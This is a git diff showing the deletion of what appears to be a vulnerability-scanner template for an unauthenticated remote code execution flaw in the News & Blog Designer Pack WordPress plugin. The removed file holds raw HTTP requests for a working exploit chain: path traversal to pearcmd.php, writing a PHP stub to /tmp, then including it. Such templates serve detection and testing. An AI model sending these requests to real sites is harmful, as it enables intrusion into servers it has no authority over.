Delete http/vulnerabilities/wordpress/blog-designer-pack-lfi.yaml
parent
e8900f088a
commit
2787cdb3d6
|
@ -1,45 +0,0 @@
|
|||
id: blog-designer-pack-lfi
|
||||
|
||||
info:
|
||||
name: News & Blog Designer Pack < 3.4.2 – Remote Code Execution
|
||||
author: iamnoooob, rootxharsh, pdresearch
|
||||
severity: critical
|
||||
description: |
|
||||
News & Blog Designer Pack contains a local file inclusion vulnerability via user controlled $design variable extracted by POST
|
||||
parameter 'shrt_param' leading to Remote Code Execution via pearcmd.php. The vulnerability occurs within bdp_get_more_post function
|
||||
inside file bdp-ajax-functions.php.
|
||||
reference:
|
||||
- https://twitter.com/frycos/status/1717571552470819285
|
||||
tags: wordpress,wp-plugin,lfi,wp,blogdesignerpack,wpscan,rce,unauth,wpscan,intrusive
|
||||
|
||||
variables:
|
||||
randomstr: "{{randstr_1}}"
|
||||
marker: "{{base64(randomstr)}}"
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=bdp_get_more_post
|
||||
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php?+config-create+/&/<?=base64_decode($_GET[0])?>+/tmp/{{randstr}}.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
&action=bdp_get_more_post&shrt_param[design]=../../../../../../../../usr/local/lib/php/pearcmd
|
||||
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php?0={{marker}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
&action=bdp_get_more_post&shrt_param[design]=../../../../../../../../tmp/{{randstr}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_1, "\"success\":0") && contains(body_2,"channel pear.php.net") && contains(body_3, "{{randomstr}}")'
|
Loading…
Reference in New Issue